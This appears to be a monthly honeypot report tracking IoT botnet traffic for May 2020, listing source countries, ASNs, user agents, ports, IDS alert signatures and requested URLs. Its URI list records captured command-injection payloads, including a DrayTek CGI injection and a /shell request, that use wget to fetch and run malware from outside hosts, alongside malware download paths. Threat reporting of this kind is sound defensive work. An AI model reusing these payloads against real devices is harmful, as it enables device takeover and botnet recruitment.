Tracking IoT Botnets

May 2020

Country - Top 10
  • United States
  • United Kingdom
  • China
  • Republic of Moldova
  • Canada
  • Italy
  • United Arab Emirates
  • Taiwan
  • Russia
  • Mexico
Country - Top 10
  • python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1062.18.1.el7.x86_64
  • XTC
  • python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.28.1.el6.x86_64
  • Wget/1.11.4
  • polaris botnet
  • Hello, world
  • XTC BOTNET
  • Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
  • Hello, World
  • DVRBOT
ASN - Top 10
  • NEW JERSEY INTERNATIONAL INTERNET EXCHANGE LLC
  • Chinanet
  • MivoCloud SRL
  • Comcast Cable Communications, LLC
  • CNCGROUP China169 Backbone
  • Data Communication Business Group
  • Emirates Telecommunications Corporation
  • Dotsi, Unipessoal Lda.
  • Compañía Dominicana de Teléfonos, C. por A. - CODETEL
  • EPM Telecomunicaciones S.A. E.S.P.

May 2020 - ASN

Destination Ports - Top 10
  • 55555
  • 80
  • 8089
  • 443
  • 9673
  • 60001
  • 52869
  • 5555
  • 49152
  • 38620

May 2020 - Dest Ports

Alert Signature
  • ET WEB_SERVER WebShell Generic - wget http - POST
  • ET WEB_SERVER 401TRG Generic Webshell Request - POST with wget in body
  • ET EXPLOIT Linksys E-Series Device RCE Attempt
  • ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound
  • ET INFO User-Agent (python-requests) Inbound to Webserver
  • ET SCAN ELF/Mirai Variant User-Agent (Inbound)
  • SURICATA HTTP missing Host header
  • SURICATA HTTP Unexpected Request body
  • ET EXPLOIT Multiple DrayTek Products Pre-authentication Remote RCE Inbound (CVE-2020-8515) M2
  • SURICATA STREAM Packet with invalid timestamp
Top HTTP Requests
  • 50.115.173.126/TiHO8bbins.sh
  • 50.115.172.172/Boih7nbins.sh
  • 51.178.81.75/bins.sh
  • 50.115.172.193/Boih7nbins.sh
  • 178.33.64.107/arm7
  • plexle.us/Th5xrRAm
  • 164.132.92.168:6479/bins/viktor.mips
  • 50.115.172.100/Bu07Fjfbins.sh
URI
  • /tmUnblock.cgi
  • /cgi
  • /cgi-bin/mainfunction.cgi
  • /spywall/timeConfig.php
  • /live/CPEManager/AXCampaignManager/delete_cpes_by_ids
  • /boaform/admin/formPing
  • /bot/bot.mipsel
  • /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a
  • /shell?cd+/tmp;rm+-rf+jaws.sh;wget+http:/\/185.62.189.18/jaws.sh;chmod+777+jaws.sh;sh+jaws.sh;rm+-rf+jaws.sh
  • /UD/act?1